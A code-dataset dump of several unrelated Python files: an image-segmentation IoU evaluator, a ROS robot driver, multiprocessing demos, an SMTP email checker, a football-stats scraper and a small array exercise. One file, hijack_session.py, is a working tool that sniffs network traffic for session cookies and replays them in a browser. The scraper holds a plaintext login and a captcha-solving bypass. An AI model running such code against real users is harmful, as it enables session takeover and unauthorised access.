float(left_WH[1][0])\r\n # W = origion_WH[0][0]\r\n # H = origion_WH[1][0]\r\n # with torch.no_grad():\r\n # pre_v2 = None\r\n # pre_v1 = None\r\n # result_dict = model(img.to(devices),\r\n # pre_v2,\r\n # pre_v1,\r\n # mode='test',\r\n # temperature=0.0) # (bs, seq_len)\r\n # pred_x = result_dict['final_pred_x'].cpu().numpy()[0]\r\n # pred_y = result_dict['final_pred_y'].cpu().numpy()[0]\r\n # pred_lengths = result_dict['lengths'].cpu().numpy()[0]\r\n # pred_len = np.sum(pred_lengths) - 1 # sub EOS\r\n # vertices1 = []\r\n # # Get the pred poly\r\n # for i in range(pred_len):\r\n # vert = (pred_x[i] / scaleW + leftW,\r\n # pred_y[i] / scaleH + leftH)\r\n # vertices1.append(vert)\r\n # gt_mask = np.array(batch[1][0])\r\n # # 这个可能不对?\r\n # gt_mask[gt_mask == 255] = 1\r\n #\r\n # # pre mask\r\n # img1 = Image.new('L', (W, H), 0)\r\n # ImageDraw.Draw(img1).polygon(vertices1, outline=1, fill=1)\r\n # pre_mask = np.array(img1) # (H, W)\r\n # # get iou\r\n # intersection = np.logical_and(gt_mask, pre_mask)\r\n # union = np.logical_or(gt_mask, pre_mask)\r\n # nu = np.sum(intersection)\r\n # de = np.sum(union)\r\n # # 求IoU\r\n # iiou = nu / (de * 1.0) if de != 0 else 0.\r\n # iou.append(iiou)\r\n #\r\n # iou.sort()\r\n # iou.reverse()\r\n # print('--------------------------------------')\r\n # # print(iou)\r\n # # print(len(iou))\r\n #\r\n # print('IoU:', np.mean(np.array(iou)))\r\n\r\n\r\n# 1. IoU: 0.7144151423515942\r\n","sub_path":"DataUtils/ADE20K.py","file_name":"ADE20K.py","file_ext":"py","file_size_in_byte":10773,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"510609307","text":"#!/usr/bin/env python\nimport time\nfrom tf.transformations import euler_from_quaternion\nimport rospy\nimport tf2_ros\nimport geometry_msgs\nfrom geometry_msgs.msg import Twist\nimport math\nimport tf_conversions\nglobal br\nglobal t\nglobal pub\nfrom geometry_msgs.msg import PoseStamped\nglobal pose_final\nglobal pose_atual\nglobal orientation\nfrom gazebo_msgs.msg import ModelStates\n\n\ndef reMap(value, maxInput, minInput, maxOutput, minOutput):\n\n\tvalue = maxInput if value > maxInput else value\n\tvalue = minInput if value < minInput else value\n\n\tinputSpan = maxInput - minInput\n\toutputSpan = maxOutput - minOutput\n\n\tscaledThrust = float(value - minInput) / float(inputSpan)\n\n\treturn minOutput + (scaledThrust * outputSpan)\n\n\n\n\ndef messageReceivedCallback(message):\n global pose_final\n global pose_atual\n global t\n\n\n\n\n tfBuffer = tf2_ros.Buffer()\n listener = tf2_ros.TransformListener(tfBuffer)\n\n rate = rospy.Rate(100)\n while not rospy.is_shutdown():\n\n # lookup_transform vai buscar a transformada entre os referencias que nos dissermos\n\n try:\n trans = tfBuffer.lookup_transform(\"World\",\"p_dcoelho/odom\", rospy.Time())\n print('dey')\n except (tf2_ros.LookupException, tf2_ros.ConnectivityException, tf2_ros.ExtrapolationException):\n rate.sleep()\n continue\n # print(trans.transform.translation)\n x = trans.transform.translation.x\n y = trans.transform.translation.y\n break\n\n #Primeiro tenho de saber a posicao do p_dcoelho em relacao ao world, e depois a que somo estas coordenadas,\n #pois estas coordenadas sao do ponto relativamente ao odom\n\n #print('Posicao' + str(x) + 'Posicao' + str(y))\n\n\n #Aqui sei para onde quero ir!\n\n message.pose.position.x=message.pose.position.x + x\n message.pose.position.y = message.pose.position.y + y\n pose_final = message.pose\n #print('Para onde vou')\n #print(pose_final)\n t = 1\n find_z_orientation()\n\n\ndef pose_now(message):\n global pose_final\n global pose_atual\n global t\n global q\n\n global x\n global y\n global theta\n\n x = message.pose[2].position.x\n y = message.pose[2].position.y\n\n rot_q = message.pose[2].orientation\n (roll, pitch, theta) = euler_from_quaternion([rot_q.x, rot_q.y, rot_q.z, rot_q.w])\n q=1\n\n\n '''\n q=1\n\n pose_atual = message.pose[2]\n # print(message.twist)\n # print(Message_Pose)\n\n #print('Onde estou')\n #print(pose_atual)\n #print(pose_atual.orientation)\n '''\n\n #return pose_atual\n\n\ndef find_z_orientation():\n global pose_final\n global pose_atual\n global orientation\n global roll, pitch, yaw\n orientation_q = pose_final.orientation\n orientation_list = [orientation_q.x, orientation_q.y, orientation_q.z, orientation_q.w]\n (roll, pitch, yaw) = euler_from_quaternion(orientation_list)\n print(yaw)\n\n #print(math.degrees(orientation))\n\n #return orientation\n\ndef rotate_until_z():\n global pub\n global pose_atual\n global pose_final\n global orientation\n twist = Twist()\n\n while not rospy.is_shutdown():\n inc_x = pose_final.position.x - x\n inc_y = pose_final.position.y - y\n\n print('atual' + str(theta))\n\n\n angle_to_goal = math.atan2(inc_y, inc_x)\n print('final' + str(angle_to_goal))\n\n if abs(angle_to_goal - theta) > 0.1:\n twist.linear.x = 0.0\n twist.angular.z = 0.3\n else:\n twist.linear.x = 0.5\n twist.angular.z = 0.0\n\n pub.publish(twist)\n rospy.sleep(0.5)\n\n\n\n\n\n\n\n\n\n\n\n\n\n '''\n print('rotating')\n twist = Twist()\n twist.linear.x = 0.0\n twist.linear.y = 0.0\n twist.linear.z = 0.0\n twist.angular.x = 0.0\n twist.angular.y = 0.0\n twist.angular.z =0.2\n\n pub.publish(twist)\n\n\n #print('aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa')\n #print(orientation)\n\n\n while True:\n\n print(\"orientacao=\" + str(orientation))\n print(\"Z=\" + str(pose_atual.orientation.z))\n (roll,pitch,yaw)=euler_from_quaternion(pose_atual.orientation)\n print(\"YAW \" + str(yaw))\n\n time.sleep(0.5)\n \n if pose_atual.orientation.z>0.93 * orientation and pose_atual.orientation.z<1.07 * orientation:\n twist = Twist()\n twist.linear.x = 0.0\n twist.linear.y = 0.0\n twist.linear.z = 0.0\n twist.angular.x = 0.0\n twist.angular.y = 0.0\n twist.angular.z = 0.0\n\n pub.publish(twist)\n #print('ORIENTACAO APONTADAAAAAAAAAAAAAAAAAA')\n break\n'''\n\ndef straigth_line():\n #print('LINHA DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDIRRRRRRRRRRRRRRRRRRRRRETTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTAAAAAAAAAAAAAAAAAAAAAAAAAAAA')\n global pub\n twist = Twist()\n twist.linear.x = 0.1\n twist.linear.y = 0.0\n twist.linear.z = 0.0\n twist.angular.x = 0.0\n twist.angular.y = 0.0\n twist.angular.z = 0.0\n pub.publish(twist)\n\n\n\n\n\n\n\n\n\ndef main():\n global br\n global t\n global pub\n global q\n t=0\n\n pub = rospy.Publisher('p_dcoelho/cmd_vel', Twist, queue_size=10)\n\n rospy.init_node('driver', anonymous=False)\n rospy.Subscriber(\"/move_base_simple/goal\", PoseStamped, messageReceivedCallback)\n rospy.Subscriber(\"/gazebo/model_states\", ModelStates, pose_now)\n\n\n while True:\n\n if t==1 and q==1:\n\n orientation = find_z_orientation()\n\n rotate_until_z()\n\n\n rospy.spin()\n \n\n\n\n\n\n print('a')\n\n\n\n\n\n\n\n\n\n\n rospy.sleep(5)\n\n straigth_line()\n\n print('end')\n break\n\n\n\n\n\n\n\n\n return\n rospy.spin()\n\n #pub = rospy.Publisher('p_dcoelho/cmd_vel', Twist, queue_size=10)\n #rate = rospy.Rate(50) # 10hz\n '''\n try:\n\n while not rospy.is_shutdown():\n\n twist = Twist()\n twist.linear.x = 1.0\n twist.linear.y = 0.0\n twist.linear.z = 0.0\n twist.angular.x = 0.0\n twist.angular.y = 0.0\n twist.angular.z = -1.0\n\n pub.publish(twist)\n\n rate.sleep()\n\n\n except:\n\n twist = Twist()\n twist.linear.x = 0.0\n twist.linear.y = 0.0\n twist.linear.z = 0.0\n twist.angular.x = 0.0\n twist.angular.y = 0.0\n twist.angular.z = 0.0\n pub.publish(twist)\n\n '''\n\nif __name__ == '__main__':\n main()\n","sub_path":"Parte13/p_dcoelho_core/src/driver2.py","file_name":"driver2.py","file_ext":"py","file_size_in_byte":6475,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"543111343","text":"#!/usr/bin/env python3\n# Paweł Rubin 2019\n#\n\"\"\"Session hijacking tool.\"\"\"\nfrom typing import List\nfrom argparse import ArgumentParser\n\nimport pyshark\nfrom selenium import webdriver\n\n\ndef parse_cookies(cookies: str) -> List[dict]:\n \"\"\"Returns list of cookies in form {\"name\": , \"value\": }\"\"\"\n return [\n {\"name\": cookie[0], \"value\": cookie[1]}\n for cookie in [cookie.split(\"=\") for cookie in cookies.split(\"; \")]\n ]\n\n\nclass SessionCookieNotFoundError(Exception):\n \"\"\"Raised when http cookies do not contain session cookie.\"\"\"\n\n\ndef get_session_cookie(cookies: str) -> dict:\n \"\"\"Return session cookie from http.cookies.\n Raises SessionCookieNotFoundError\"\"\"\n try:\n return next(\n cookie\n for cookie in parse_cookies(cookies)\n if cookie[\"name\"] == \"JSESSIONID\" or cookie[\"name\"] == \"PHPSESSID\"\n )\n except StopIteration:\n raise SessionCookieNotFoundError()\n\n\ndef hijack_session(interface):\n \"\"\"Listens on given interface until session cookie has been found.\n Opens Firefox webdriver with the cookie.\"\"\"\n capture = pyshark.LiveCapture(\n interface=interface, display_filter=\"http.cookie || http.cookie_pair\"\n )\n\n for packet in capture.sniff_continuously():\n try:\n base_url = packet.http.referer\n session_cookie = get_session_cookie(packet.http.cookie)\n browser = webdriver.Firefox()\n browser.get(base_url)\n browser.add_cookie(session_cookie)\n browser.refresh()\n break\n except (AttributeError, SessionCookieNotFoundError):\n continue\n\ndef parse_cli():\n \"\"\"Parses command line arguments.\"\"\"\n parser = ArgumentParser()\n\n parser.add_argument(\n \"--interface\",\n \"-i\",\n type=str,\n required=True,\n help=\"Network interface name.\",\n )\n\n return parser.parse_args()\n\nif __name__ == \"__main__\":\n args = parse_cli()\n hijack_session(args.interface)\n","sub_path":"l02/hijack_session.py","file_name":"hijack_session.py","file_ext":"py","file_size_in_byte":2025,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"619530663","text":"import re\nimport dns.resolver\nimport socket\nimport smtplib\n\n\ndef verify(address, email):\n toVerify = address\n match = re.match('^[_a-z0-9-]+(\\.[_a-z0-9-]+)*@[a-z0-9-]+(\\.[a-z0-9-]+)*(\\.[a-z]{2,4})$', toVerify)\n\n if match is None:\n print('Invalid syntax')\n raise ValueError('Could not verify email address provided')\n\n # run the address through a dns resolver and return a MX record as exchanged in a string format\n records = dns.resolver.query(toVerify, 'MX')\n mxr = records[0].exchange\n mxr = str(mxr)\n\n # running a check to make sure that the email address actually exists\n\n host = socket.gethostname()\n server = smtplib.SMTP()\n server.set_debuglevel(0)\n\n # handle the conversation with the MX record\n server.connect(mxr)\n server.helo(host) # gotta be friendly\n server.mail(email)\n code, message = server.rcpt(str(toVerify))\n server.quit()\n\n # 250 will be a success...hopefully\n\n if code == 250:\n print('Email address {0} is valid!'.format(toVerify))\n else:\n print('Email address {0} is invalid!'.format(toVerify))","sub_path":"verification.py","file_name":"verification.py","file_ext":"py","file_size_in_byte":1105,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"599075738","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n\n# @File : multiprocessing_test.py\n# @Time : 2019/2/26 21:47\n# @Author : MaiXiaochai\n# @Site : https://github.com/MaiXiaochai\n\nimport time\nimport multiprocessing\nfrom concurrent.futures import ProcessPoolExecutor\n\n\ndef get_html(n):\n time.sleep(n)\n print(\"sub process success\")\n return n\n\n\ndef main_pool():\n pool = multiprocessing.Pool(multiprocessing.cpu_count())\n # 异步提交任务\n # result = pool.apply_async(get_html, args=(3, ))\n #\n # # 等待所有任务执行完成,完成后就可以得到result数据了\n # pool.close()\n # pool.join()\n # print(result.get())\n \"\"\"\n out:\n sub process success\n 3\n \"\"\"\n\n # # imap 与线程池中的map和Python中的map类似,结果按序返回\n # for result in pool.imap(get_html, [1, 5, 3]):\n # print(\"{} sleep success\".format(result))\n \"\"\"\n out:\n sub process success\n 1 sleep success\n sub process success\n sub process success\n 5 sleep success\n 3 sleep success\n \"\"\"\n\n # imap_unordered 谁先完成,打印谁的结果\n for result in pool.imap_unordered(get_html, [1, 5, 3]):\n print(\"{} sleep success\".format(result))\n \"\"\"\n out:\n sub process success\n 1 sleep success\n sub process success\n 3 sleep success\n sub process success\n 5 sleep success\n \"\"\"\n\n\ndef main():\n process = multiprocessing.Process(target=get_html, args=(2, ))\n print(process.pid)\n process.start()\n print(process.pid)\n process.join()\n print(\"main progress end\")\n \"\"\"\n out:\n None\n 10000\n sub process success\n main progress end\n \"\"\"\n\n\nif __name__ == \"__main__\":\n main_pool()\n\n\n","sub_path":"expert_python/src/multiprocessing_test.py","file_name":"multiprocessing_test.py","file_ext":"py","file_size_in_byte":1709,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"291363482","text":"# -*- coding: utf-8 -*-\r\nimport os\r\nimport re\r\nimport csv\r\nimport time\r\nimport random\r\nimport requests\r\nfrom lxml import etree\r\nfrom datetime import datetime\r\nfrom selenium import webdriver\r\n# from chaojiying import Chaojiying_Client\r\n\r\nclass Selenium_Middleware(object):\r\n\r\n def __init__(self):\r\n self.chromeOptions = self.get_chrome()\r\n self.browser = self.get_browser()\r\n\r\n def get_chrome(self):\r\n chromeOptions = webdriver.ChromeOptions()\r\n chromeOptions.add_argument('--headless')\r\n chromeOptions.add_argument('--disable-gpu')\r\n chromeOptions.add_argument('window-size=1280,800')\r\n chromeOptions.add_argument(\"--no-sandbox\")\r\n chromeOptions.add_argument('blink-settings=imagesEnabled=false')\r\n return chromeOptions\r\n\r\n def get_browser(self):\r\n browser = webdriver.Chrome(chrome_options=self.chromeOptions)\r\n browser.set_page_load_timeout(10)\r\n browser.set_script_timeout(10)\r\n return browser\r\n\r\n\r\nrequests.packages.urllib3.disable_warnings()\r\n\r\n\r\nclass Dszuqiu(Selenium_Middleware):\r\n def __init__(self):\r\n self.session = self.session()\r\n self.headers = self.headers()\r\n self.headers2 = self.headers2()\r\n super().__init__()\r\n\r\n def session(self):\r\n session = requests.session()\r\n session.keep_alive = False\r\n session.adapters.DEFAULT_RETRIES = 10\r\n return session\r\n\r\n def headers(self):\r\n headers = {\r\n \"User-Agent\": random.choice([\r\n \"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 OPR/26.0.1656.60\",\r\n \"Opera/8.0 (Windows NT 5.1; U; en)\",\r\n \"Mozilla/5.0 (Windows NT 5.1; U; en; rv:1.8.1) Gecko/20061208 Firefox/2.0.0 Opera 9.50\",\r\n \"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 9.50\",\r\n \"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:34.0) Gecko/20100101 Firefox/34.0\",\r\n \"Mozilla/5.0 (X11; U; Linux x86_64; zh-CN; rv:1.9.2.10 Gecko / 20100922Ubuntu / 10.10(maverick)Firefox / 3.6.10\",\r\n # Safari\r\n \"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.57.2 (KHTML, like Gecko) Version/5.1.7 Safari/534.57.2\",\r\n # chrome\r\n \"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36\",\r\n \"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.64 Safari/537.11\",\r\n \"Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.133 Safari/534.16\",\r\n # 360\r\n \"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/30.0.1599.101 Safari/537.36\",\r\n \"Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko\", # 淘宝浏览器\r\n \"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.11 (KHTML, like Gecko) Chrome/20.0.1132.11 TaoBrowser/2.0 Safari/536.11\",\r\n # 猎豹浏览器\r\n \"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.71 Safari/537.1 LBBROWSER\",\r\n \"Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; LBBROWSER)\",\r\n \"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; QQDownload 732; .NET4.0C; .NET4.0E; LBBROWSER)\",\r\n # QQ浏览器\r\n \"Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; QQBrowser/7.0.3698.400)\",\r\n \"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; QQDownload 732; .NET4.0C; .NET4.0E)\",\r\n # sogou浏览器\r\n \"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.84 Safari/535.11 SE 2.X MetaSr 1.0\",\r\n \"Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; SV1; QQDownload 732; .NET4.0C; .NET4.0E; SE 2.X MetaSr 1.0)\",\r\n # maxthon浏览器\r\n \"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Maxthon/4.4.3.4000 Chrome/30.0.1599.101 Safari/537.36\",\r\n # UC浏览器\r\n \"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.122 UBrowser/4.0.3214.0 Safari/537.36\",\r\n ]),\r\n 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',\r\n 'Accept-Encoding': 'gzip, deflate',\r\n 'Accept-Language': 'en-US,en;q=0.5',\r\n 'Connection': 'keep-alive',\r\n 'Upgrade-Insecure-Requests': '1',\r\n }\r\n return headers\r\n\r\n def headers2(self):\r\n headers2 = {\r\n \"User-Agent\": 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.72 Safari/537.36',\r\n 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',\r\n 'Accept-Encoding': 'gzip, deflate',\r\n 'Accept-Language': 'en-US,en;q=0.5',\r\n 'Connection': 'keep-alive',\r\n 'Upgrade-Insecure-Requests': '1',\r\n 'Cookie': ''\r\n }\r\n return headers2\r\n\r\n def login(self):\r\n login_url = 'https://www.dszuqiu.com/w_login'\r\n captcha_url = 'https://www.dszuqiu.com/captcha'\r\n resp = self.session.get(captcha_url, headers=self.headers, timeout=30, verify=False)\r\n print(resp.status_code)\r\n path = os.path.dirname(os.path.abspath(__file__))\r\n open(f\"{path}/img/football.png\", 'wb').write(resp.content)\r\n im = open(f'{path}/img/football.png', 'rb').read()\r\n chaojiying = Chaojiying_Client()\r\n code = chaojiying.PostPic(im, 1006)\r\n result = code[\"pic_str\"].lower()\r\n print('验证码识别结果为:', result)\r\n data = {\r\n \"zhanghu\": 'foreign.trade1@cibsc.biz',\r\n \"password\": '11223344o',\r\n \"captcha_input\": result,\r\n \"rememberMe\": '1',\r\n \"is_ajax\": '1'\r\n }\r\n response = self.session.post(login_url, headers=self.headers, data=data)\r\n print(response.status_code)\r\n cookie = requests.utils.dict_from_cookiejar(self.session.cookies)\r\n return cookie\r\n\r\n def biaodan(self,lsID, start_page, end_page):\r\n for page in range(start_page, end_page+1):\r\n index_url = f\"https://www.dszuqiu.com/league/{lsID}/p.{page}?type=ended_race\"\r\n res = self.session.get(index_url, headers=self.headers, timeout=30, verify=False)\r\n print('第一次请求:', res.status_code)\r\n if res.status_code == 200:\r\n html = etree.HTML(res.text)\r\n xi = html.xpath('//section[@id=\"ended\"]//tbody/tr/td/a[@title=\"析\"]/@href')\r\n for x in xi:\r\n id = re.findall('/race/([\\s|\\S]+)', x)[0]\r\n print(id)\r\n url = 'http://www.dszuqiu.com/race_ss/' + id\r\n response = self.session.get(url, headers=self.headers, timeout=30, verify=False)\r\n # 延迟秒数\r\n time.sleep(random.randint(2,10))\r\n print('第二次请求:', response.status_code)\r\n dhtml = etree.HTML(response.text)\r\n try:\r\n # 比赛球队\r\n qiudui = dhtml.xpath('//h3[@class=\"dsBreadcrumbs\"]/text()')[-1].strip()\r\n # 指数趋势\r\n zhishu = dhtml.xpath('//*[@id=\"race_part\"]/div[3]/div/table/tbody/tr/td[5]/a/text()')[0].strip()\r\n # 半角球全\r\n jiao1 = dhtml.xpath('//*[@id=\"race_part\"]/div[3]/div/table/tbody/tr/td[1]/text()')[0].strip()\r\n jiao2 = dhtml.xpath('//*[@id=\"race_part\"]/div[3]/div/table/tbody/tr/td[2]/text()')[0].strip()\r\n jiaoquan = jiao1 + ' ' + jiao2\r\n # 半进球全\r\n jin1 = dhtml.xpath('//*[@id=\"race_part\"]/div[3]/div/table/tbody/tr/td[3]/text()')[0].strip()\r\n jin2 = dhtml.xpath('//*[@id=\"race_part\"]/div[3]/div/table/tbody/tr/td[4]/text()')[0].strip()\r\n jinquan = jin1 + ' ' + jin2\r\n # 进球分布主\r\n try:\r\n jinzhu1 = dhtml.xpath(\r\n '/html/body/div/main/div/div/div/div[2]/div/div[1]/div[2]/div/div[1]/table/tbody/tr/td[1]/text()')[\r\n 0].strip()\r\n jinzhu2 = dhtml.xpath(\r\n '/html/body/div/main/div/div/div/div[2]/div/div[1]/div[2]/div/div[1]/table/tbody/tr/td[2]/text()')[\r\n 0].strip()\r\n jinzhu3 = dhtml.xpath(\r\n '/html/body/div/main/div/div/div/div[2]/div/div[1]/div[2]/div/div[1]/table/tbody/tr/td[3]/text()')[\r\n 0].strip()\r\n jinzhu4 = dhtml.xpath(\r\n '/html/body/div/main/div/div/div/div[2]/div/div[1]/div[2]/div/div[1]/table/tbody/tr/td[4]/text()')[\r\n 0].strip()\r\n jinzhu5 = dhtml.xpath(\r\n '/html/body/div/main/div/div/div/div[2]/div/div[1]/div[2]/div/div[1]/table/tbody/tr/td[5]/text()')[\r\n 0].strip()\r\n jinzhu6 = dhtml.xpath(\r\n '/html/body/div/main/div/div/div/div[2]/div/div[1]/div[2]/div/div[1]/table/tbody/tr/td[6]/text()')[\r\n 0].strip()\r\n jinzhu = jinzhu1 + ' ' + jinzhu2 + ' ' + jinzhu3 + ' ' + jinzhu4 + ' ' + jinzhu5 + ' ' + jinzhu6\r\n except:\r\n jinzhu = ''\r\n # 进球分布客\r\n try:\r\n jinke1 = dhtml.xpath(\r\n '/html/body/div/main/div/div/div/div[2]/div/div[1]/div[2]/div/div[2]/table/tbody/tr/td[1]/text()')[\r\n 0].strip()\r\n jinke2 = dhtml.xpath(\r\n '/html/body/div/main/div/div/div/div[2]/div/div[1]/div[2]/div/div[2]/table/tbody/tr/td[2]/text()')[\r\n 0].strip()\r\n jinke3 = dhtml.xpath(\r\n '/html/body/div/main/div/div/div/div[2]/div/div[1]/div[2]/div/div[2]/table/tbody/tr/td[3]/text()')[\r\n 0].strip()\r\n jinke4 = dhtml.xpath(\r\n '/html/body/div/main/div/div/div/div[2]/div/div[1]/div[2]/div/div[2]/table/tbody/tr/td[4]/text()')[\r\n 0].strip()\r\n jinke5 = dhtml.xpath(\r\n '/html/body/div/main/div/div/div/div[2]/div/div[1]/div[2]/div/div[2]/table/tbody/tr/td[5]/text()')[\r\n 0].strip()\r\n jinke6 = dhtml.xpath(\r\n '/html/body/div/main/div/div/div/div[2]/div/div[1]/div[2]/div/div[2]/table/tbody/tr/td[6]/text()')[\r\n 0].strip()\r\n jinke = jinke1 + ' ' + jinke2 + ' ' + jinke3 + ' ' + jinke4 + ' ' + jinke5 + ' ' + jinke6\r\n except:\r\n jinke = ''\r\n # 主客\r\n self.browser.get(url)\r\n fhtml = etree.HTML(self.browser.page_source)\r\n zhukezhu = fhtml.xpath('//*[@id=\"history_table\"]/table/tbody/tr[1]/td[3]/text()')[0].strip()\r\n zhukeke = fhtml.xpath('//*[@id=\"history_table\"]/table/tbody/tr[3]/td[3]/text()')[0].strip()\r\n zhukejsz = fhtml.xpath('//*[@id=\"history_table\"]/table/tbody/tr[1]/td[8]//text()')\r\n zhukejsz = ''.join(zhukejsz)\r\n zhukejsk = fhtml.xpath('//*[@id=\"history_table\"]/table/tbody/tr[3]/td[8]//text()')\r\n zhukejsk = ''.join(zhukejsk)\r\n zhukepz = fhtml.xpath('//*[@id=\"history_table\"]/table/tbody/tr[1]/td[6]//text()')\r\n zhukepz = ''.join(zhukepz)\r\n zhukepk = fhtml.xpath('//*[@id=\"history_table\"]/table/tbody/tr[3]/td[6]//text()')\r\n zhukepk = ''.join(zhukepk)\r\n zhukezs = fhtml.xpath('//*[@id=\"history_table\"]/table/tbody/tr[1]/td[7]//text()')\r\n zhukezs = ''.join(zhukezs)\r\n zhukeks = fhtml.xpath('//*[@id=\"history_table\"]/table/tbody/tr[3]/td[7]//text()')\r\n zhukeks = ''.join(zhukeks)\r\n # 全部\r\n self.browser.find_elements_by_xpath('//*[@id=\"tabid1\"]')[0].click()\r\n ghtml = etree.HTML(self.browser.page_source)\r\n quanjinzhu = ghtml.xpath('//*[@id=\"history_table\"]/table/tbody/tr[1]/td[3]/text()')[0].strip()\r\n quanjinke = ghtml.xpath('//*[@id=\"history_table\"]/table/tbody/tr[3]/td[3]/text()')[0].strip()\r\n quanshengjsz = ghtml.xpath('//*[@id=\"history_table\"]/table/tbody/tr[1]/td[8]//text()')\r\n quanshengjsz = ''.join(quanshengjsz)\r\n quanshengjsk = ghtml.xpath('//*[@id=\"history_table\"]/table/tbody/tr[3]/td[8]//text()')\r\n quanshengjsk = ''.join(quanshengjsk)\r\n quanyingpz = ghtml.xpath('//*[@id=\"history_table\"]/table/tbody/tr[1]/td[6]//text()')\r\n quanyingpz = ''.join(quanyingpz)\r\n quanyingpk = ghtml.xpath('//*[@id=\"history_table\"]/table/tbody/tr[3]/td[6]//text()')\r\n quanyingpk = ''.join(quanyingpk)\r\n quanzs = ghtml.xpath('//*[@id=\"history_table\"]/table/tbody/tr[1]/td[7]//text()')\r\n quanzs = ''.join(quanzs)\r\n quanks = ghtml.xpath('//*[@id=\"history_table\"]/table/tbody/tr[3]/td[7]//text()')\r\n quanks = ''.join(quanks)\r\n\r\n info = [url, qiudui + '\\t', zhishu + '\\t', jiaoquan + '\\t', jinquan + '\\t', jinzhu + '\\t',\r\n jinke + '\\t',\r\n zhukezhu + '\\t', zhukeke + '\\t', zhukejsz + '\\t', zhukejsk + '\\t', zhukepz + '\\t',\r\n zhukepk + '\\t', zhukezs + '\\t', zhukeks + '\\t',\r\n quanjinzhu + '\\t', quanjinke + '\\t', quanshengjsz + '\\t', quanshengjsk + '\\t',\r\n quanyingpz + '\\t', quanyingpk + '\\t', quanzs + '\\t', quanks + '\\t']\r\n print(info)\r\n name = f'DS比赛统计{lsID}'\r\n if not os.path.exists(f'{name}.csv'):\r\n head = ['url', '比赛球队', '指数走势', '半角球全', '半进球全', '进球分布主', '进球分布客',\r\n '主客进球主', '主客进球客', '主客净胜主', '主客净胜客', '主客赢盘主', '主客赢盘客', '主客主胜', '主客客胜',\r\n '全进球主', '全进球客', '全净胜主', '全净胜客', '全赢盘主', '全赢盘客', '全主胜', '全客胜']\r\n csvFile = open(f'{name}.csv', 'a', newline='', encoding='utf-8-sig')\r\n writer = csv.writer(csvFile)\r\n writer.writerow(head)\r\n csvFile.close()\r\n else:\r\n csvFile = open(f'{name}.csv', 'a+', newline='', encoding='utf-8-sig')\r\n writer = csv.writer(csvFile)\r\n writer.writerow(info)\r\n csvFile.close()\r\n except:\r\n pass\r\n\r\nif __name__ == '__main__':\r\n lsID, start_page, end_page = map(int, input('请输入联赛id、爬取页数(多少页到多少页以空格分开):').split())\r\n lz = Dszuqiu()\r\n lz.biaodan(lsID, start_page, end_page)\r\n","sub_path":"endzuqiu.py","file_name":"endzuqiu.py","file_ext":"py","file_size_in_byte":16717,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"557539553","text":"\"\"\"\nGiven an array of integers, \nfind the maximal absolute difference between \nany two of its adjacent elements.\n\nFor inputArray = [2, 4, 1, 0], the output should be\narrayMaximalAdjacentDifference(inputArray) = 3.\n\"\"\"\ndef arrayMaximalAdjacentDifference(inputArray):\n maxi = float(\"-inf\")\n for i in range(len(inputArray)-1):\n if abs(inputArray[i+1]-inputArray[i])> maxi:\n maxi = abs(inputArray[i+1]-inputArray[i])\n return maxi\n\ninputArray = [1,5,3,4]\nprint(arrayMaximalAdjacentDifference(inputArray))","sub_path":"CodeSignal/maxDiffAdjacent.py","file_name":"maxDiffAdjacent.py","file_ext":"py","file_size_in_byte":526,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"384924417","text":"from django.shortcuts import redirect, render, get_object_or_404\nfrom 